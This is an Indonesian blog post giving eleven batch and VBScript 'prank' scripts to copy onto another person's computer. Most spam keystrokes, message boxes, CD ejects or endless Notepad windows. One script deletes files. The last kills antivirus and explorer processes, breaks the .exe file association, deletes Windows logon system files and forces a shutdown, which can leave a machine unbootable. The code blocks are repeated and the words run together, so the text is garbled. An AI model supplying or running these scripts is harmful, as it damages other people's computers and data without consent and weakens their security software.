Saya ada script
khusus untuk menjahili orang (tanggung sendiri resikonya)
Modal kamu cukup :
1. Komputer
2. Notepad / Notepad++ / EditPlus
3. Pengetahuan Copy Paste.
Okekitalangsungsajaprakteknya :
Pertamabukadulu
editor text yang Andasuka (Notepad
/ Notepad++ / EditPlus)
Copykan Script dibawahinikedalam Text Editor
Copykan Script dibawahinikedalam Text Editor
1. MESSAGES YG TERUS MENERUS SECARA OTOMATIS
Code:
@ECHO off
:Begin
msg * Hy..
msg * Inikompikamu yah :P
msg * Maaf yah.. Cumangetesdoankkok
msg * Hihihiiii
msg * Peace
GOTO BEGIN
:Begin
msg * Hy..
msg * Inikompikamu yah :P
msg * Maaf yah.. Cumangetesdoankkok
msg * Hihihiiii
msg * Peace
GOTO BEGIN
ket :
Save denganekstensi *.bat
2. BIKIN SHUTDOWN + MESSAGES
Code:
@ECHO off
msg * Your Computer Is Error By Crazy
shutdown -s -c "Error!"
msg * Your Computer Is Error By Crazy
shutdown -s -c "Error!"
ket : Save denganekstensi *.bat
3. OTOMATIS TOMBOL CAPS LOCK
3. OTOMATIS TOMBOL CAPS LOCK
Code:
Set
wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
ket : Save
denganekstensi *.vbs
4. BUKA TUTUP CD/DVD SECARA OTOMATIS
Code:
Set oWMP
= CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
ket : Save
denganekstensi *.vbs
5. MENEKAN TOMBOL ENTER SECARA TERUS MENERUS
Code:
Set
wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
ket : Save denganekstensi *.vbs
6. MENEKAN TOMBOL BACKSPACE SECARA TERUS MENERUS
Code:
MsgBox
“Lets Rumble”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
ket : Save
denganekstensi *.vbs
7. OTOMATIS NGETIK “DasarKomputerPinjaman” DI NOTEPAD ATAU M.WORD
Code:
Set
wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "DasarKomputerPinjaman"
loop
do
wscript.sleep 100
wshshell.sendkeys "DasarKomputerPinjaman"
loop
ket : Save
denganekstensi *.vbs
8. MEMBUKA NOTEPAD TERUS MENERUS
Code:
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
ket : Save
denganekstensi *.bat
9. OTOMATIS BUKA NOTEPAD LALU NGETIK “APA YG LO MAU”
Code:
WScript.Sleep
180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Ka”
WScript.Sleep 500
WshShell.SendKeys “mu ”
WScript.Sleep 500
WshShell.SendKeys “, je”
WScript.Sleep 500
WshShell.SendKeys “l ek”
WScript.Sleep 500
WshShell.SendKeys “am ”
WScript.Sleep 500
WshShell.SendKeys “at”
WScript.Sleep 500
WshShell.SendKeys “ya ”
WScript.Sleep 500
WshShell.SendKeys “P er”
WScript.Sleep 500
WshShell.SendKeys “ma k”
WScript.Sleep 500
WshShell.SendKeys “tuh”
WScript.Sleep 500
WshShell.SendKeys ” mu”
WScript.Sleep 500
WshShell.SendKeys “ka”
WScript.Sleep 500
WshShell.SendKeys “hohoho “
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Ka”
WScript.Sleep 500
WshShell.SendKeys “mu ”
WScript.Sleep 500
WshShell.SendKeys “, je”
WScript.Sleep 500
WshShell.SendKeys “l ek”
WScript.Sleep 500
WshShell.SendKeys “am ”
WScript.Sleep 500
WshShell.SendKeys “at”
WScript.Sleep 500
WshShell.SendKeys “ya ”
WScript.Sleep 500
WshShell.SendKeys “P er”
WScript.Sleep 500
WshShell.SendKeys “ma k”
WScript.Sleep 500
WshShell.SendKeys “tuh”
WScript.Sleep 500
WshShell.SendKeys ” mu”
WScript.Sleep 500
WshShell.SendKeys “ka”
WScript.Sleep 500
WshShell.SendKeys “hohoho “
ket : Save
denganekstensi *.vbs
10. BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2
Code:
@echo off
title quiz hariini :)
:menu
cls
echo jikakamukena virus apa
yang kamulakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. formataja
echo 3. bingungahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngacadulugih
msg * hayolo,cpulugw acak2
msg * ud install ulangaja
msg * biarmasalahnyakelar
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
title quiz hariini :)
:menu
cls
echo jikakamukena virus apa
yang kamulakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. formataja
echo 3. bingungahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngacadulugih
msg * hayolo,cpulugw acak2
msg * ud install ulangaja
msg * biarmasalahnyakelar
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
ket : Save denganekstensi *.bat
11. YANG INI PALING BAHAYA, JANGAN DICOBA DI KOMPUTER KAMU
Code:
@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:\WINDOWS
\system32\logoff.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:\WINDOWS
\system32\logoff.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”
ket : Save
denganekstensi *.bat
Tidak ada komentar:
Posting Komentar